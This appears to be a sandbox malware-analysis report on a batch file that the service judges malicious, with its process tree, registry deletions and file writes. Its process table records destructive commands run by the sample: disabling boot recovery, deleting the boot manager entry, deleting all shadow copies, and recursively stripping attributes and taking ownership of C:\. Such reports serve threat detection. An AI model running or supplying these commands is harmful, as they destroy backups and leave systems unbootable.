File name: | asdasd.txt |
Full analysis: | https://app.any.run/tasks/f9536e7b-5471-4589-9101-5f74da90f690 |
Verdict: | Malicious activity |
Analysis date: | December 06, 2022, 00:40:00 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with CRLF line terminators |
MD5: | 393457D7C5C099F33FC57B1149DFC0DB |
SHA1: | 9522B1B78A20557E57AE5C872604467717DEDE45 |
SHA256: | 48C7DBD6E1DD60BD379E74E317FACCFB2748A19C27BE38BE25F60B0470AFAFF7 |
SSDEEP: | 6:hgWm6ghF+2OgF128PNSg/8fhrhy3Idw9PvJo9wsUZ7G3kbfb3bgYD:mLnQMQgEZV6ZiUBgkbrbgYD |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
856 | "C:\Windows\system32\NOTEPAD.EXE" "C:\Users\admin\Desktop\asdasd.txt" | C:\Windows\system32\NOTEPAD.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1944 | "C:\Windows\System32\cmd.exe" /C "C:\Users\admin\Desktop\asdasd.bat" | C:\Windows\System32\cmd.exe | Explorer.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1464 | BCDEDIT /SET RECOVERYENABLED NO | C:\Windows\system32\bcdedit.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Boot Configuration Data Editor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1912 | BCDEDIT /DELETE {BOOTMGR} /f /CLEANUP | C:\Windows\system32\bcdedit.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Boot Configuration Data Editor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3140 | VSSADMIN DELETE SHADOWS /all -quiet | C:\Windows\system32\vssadmin.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Command Line Interface for Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3184 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3852 | ATTRIB -R -A -S -H -I C:\*.* /S /D | C:\Windows\system32\attrib.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Attribute Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2548 | TAKEOWN /F C:\*.* /R /D Y | C:\Windows\system32\takeown.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Takes ownership of a file Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | — | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{345b46fd-a9f9-11e7-a83c-e8a4f72b1d33}\Elements\16000009 |
Operation: | write | Name: | Element |
Value: 00 | |||
(PID) Process: | — | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Description |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | — | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\11000001 |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | — | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\12000004 |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | — | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\12000005 |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | — | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\14000006 |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | — | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\23000003 |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | — | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\23000006 |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | — | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\24000001 |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | — | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\24000010 |
Operation: | delete key | Name: | (default) |
Value: |
PID | Process | Filename | Type | |
---|---|---|---|---|
1944 | cmd.exe | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb | — | |
MD5:— | SHA256:— | |||
1944 | cmd.exe | C:\Windows\System32\winevt\Logs\Application.evtx | — | |
MD5:— | SHA256:— | |||
1944 | cmd.exe | C:\Windows\System32\winevt\Logs\System.evtx | — | |
MD5:— | SHA256:— | |||
856 | NOTEPAD.EXE | C:\Users\admin\Desktop\asdasd.txt | text | |
MD5:393457D7C5C099F33FC57B1149DFC0DB | SHA256:48C7DBD6E1DD60BD379E74E317FACCFB2748A19C27BE38BE25F60B0470AFAFF7 | |||
1944 | cmd.exe | C:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat | binary | |
MD5:BA71717819F680A38E9A3E0FFBE0C441 | SHA256:3059F02AA7DA426E3865B3A9304B02F04433BFCE846BE0094BF4B9E643F509CC | |||
1944 | cmd.exe | C:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat | binary | |
MD5:CD3D3E4AF1EDAAD1A1109EC12782C31D | SHA256:1AE32F202F660612852BF691A9FAF21E96B0ECADEFF1B9B82054B9AA36F9505B | |||
1944 | cmd.exe | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.14.gthr | text | |
MD5:4B4892BCBCFF79413BA22D475D650885 | SHA256:94C2FDF7E2445A2F625D037D0C50C43FA759D162A212C2E9A738479A6776963F | |||
3852 | attrib.exe | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx | evtx | |
MD5:CBAD757EC11AE221377FAB60F6849540 | SHA256:7AF6F000FF721629F538DEF21BD2D071DF604225F61454276D4625958EC4A699 | |||
3852 | attrib.exe | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.log | binary | |
MD5:969890E3BBD644C98DC64CAEC7AED96F | SHA256:A0D868C0F263847A1F11F80202CA12C04A056244AE4C63D050EEFD632EC4319A | |||
1944 | cmd.exe | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000 | binary | |
MD5:213F03C41E5AAE316C55C2291F15CC0F | SHA256:E0EF84E21BCE8E31A1CF9948B7AF57EDCB2F0DF4D321C61A18E3872C291E48BF |